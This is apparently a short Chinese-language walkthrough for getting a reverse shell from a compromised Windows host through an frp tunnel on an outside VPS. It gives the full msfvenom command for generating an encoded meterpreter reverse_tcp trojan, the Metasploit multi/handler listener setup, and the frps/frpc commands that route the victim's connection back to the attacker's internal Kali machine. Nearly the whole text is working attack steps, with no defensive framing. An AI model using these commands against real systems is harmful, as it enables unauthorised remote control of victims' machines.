攻击者:
失陷主机或服务器:
frp存在客户端和服务端,frp服务运行起来后服务端会自行开放7000端口。
内网kali用户上配置frpc客户端
vps7.7.7.7上配置frps服务端
frps和frpc做好链接后内网IP和vps7.7.7.7就建立了一个隧道
frp服务(vps)的4444端口会主动转发(通过7000端口)给客户端设定接收流量的端口
内网IP查看能否与外网通信
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.223 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5
解释:
这是一个使用Metasploit框架中的msfvenom工具生成恶意软件的命令。
木马上传至失陷主机
1、启动msf :msfconsole
2、载入监控模块 :use exploit/multi/handler
3、加载payload:
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
run
kali主机启动监听等待木马连接
失陷主机运行木马后将流量数据包发送给vps的4444端口,但是vps没有开放4444端口
frp服务端
查看frp服务端的配置文件,当启动frp服务端的时候默认开启7000端口和客户端连接。向客户端发流量数据包。
在frps.exe所在文件打开cmd
frps.exe -c frps.ini #启动frp服务器
frp客户端:
解压frp客户端压缩包
tar xf frp_0.33.0_linux_amd64.tar.gz
进入frp_0.33.0_linux_amd64目录查看客户端配置信息
cd frp_0.33.0_linux_amd64
ls
sudo vim frpc.ini
启动frp客户端(frpc)
sudo ./frpc -c frpc.ini #启动客户端
失陷主机运行木马
打开生成木马界面获得shell